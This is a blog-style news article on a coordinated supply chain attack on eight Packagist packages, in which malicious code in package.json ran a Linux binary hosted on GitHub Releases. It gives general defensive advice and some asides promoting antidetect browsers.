8 Packagist Packages Hit by Coordinated Supply Chain Attack

Robert Moore · 2026-05-23

A new coordinated supply chain attack campaign has hit eight packages on Packagist, slipping in malicious code that runs a Linux binary from a GitHub Releases URL. This isn't your typical hack-and-run job; it's a carefully orchestrated effort that targets developers who use Composer for PHP dependencies. But here's the twist: the bad code wasn't tucked into the usual composer.json file. Instead, it was planted in package.json, which means it's aimed at projects that also handle JavaScript. ### What Happened? Security firm Socket broke down the attack. They found that while all affected packages were Composer packages, the malicious payload lived in package.json. That file is normally used for Node.js projects, but in this case, it was hijacked to trigger a Linux binary hosted on GitHub Releases. When a developer installs one of these compromised packages, the binary runs in the background, potentially giving attackers control over the system. Here's what we know about the campaign: - **8 packages were infected** on Packagist, the main repository for PHP packages. - **The attack was coordinated**, meaning it wasn't random; someone planned this. - **The malware is Linux-based**, so it targets servers and development machines running Linux. - **GitHub Releases was used** to host the malicious binary, making it look legit. ### Why This Matters for Developers If you're a developer using Composer, this attack is a wake-up call. Supply chain attacks are getting smarter. They don't just mess with the obvious files; they hide in places you might not check. The fact that package.json was used instead of composer.json shows attackers are studying how projects are structured. They know many PHP projects also use JavaScript tools, so they exploit that overlap. Think of it like this: you lock your front door (composer.json), but they sneak in through the window (package.json). It's a reminder to review all dependencies, not just the main ones. For teams using antidetect browsers to manage multiple online identities, this attack adds another layer of risk. If your development environment is compromised, your antidetect browser profiles could be exposed, leaking sensitive data. ### How to Protect Your Workflow Staying safe means being proactive. Here are some steps you can take: - **Audit your dependencies regularly.** Use tools like Composer's audit command to check for known vulnerabilities. - **Review package.json files** in your projects, even if you don't use Node.js. Attackers might still target them. - **Monitor GitHub Releases URLs** in your code. If a package downloads something from a release, verify it's from a trusted source. - **Use a sandbox environment** for testing new packages. This isolates any potential malware before it hits your main system. - **Keep your antidetect browser updated** to protect against any exploits that might target your browser profiles. ### The Bigger Picture This attack isn't isolated. Supply chain attacks have been on the rise, with campaigns targeting everything from npm packages to PyPI libraries. The use of GitHub Releases as a hosting platform is clever—it's a trusted domain, so it might bypass some security filters. For developers, it means we can't rely on reputation alone. Even a package from a known author could be compromised if their account is hacked. Socket's report highlights a key point: the malicious code wasn't complex, but the delivery method was. By targeting package.json, attackers reached a wider audience. It's a reminder that security is about layers. You can't just trust one file or one platform. You have to check everything. ### Final Thoughts If you're using any of the affected packages, remove them immediately and scan your system for any signs of compromise. For everyone else, use this as a lesson. The digital landscape is evolving, and so are the threats. Whether you're managing antidetect browsers for privacy or building the next big app, staying vigilant is your best defense. Keep your tools updated, audit your code, and never assume you're safe just because you're using a trusted repository. For more insights on digital privacy and security, follow me, Robert Moore, as I continue to explore the intersection of antidetect technology and cybersecurity.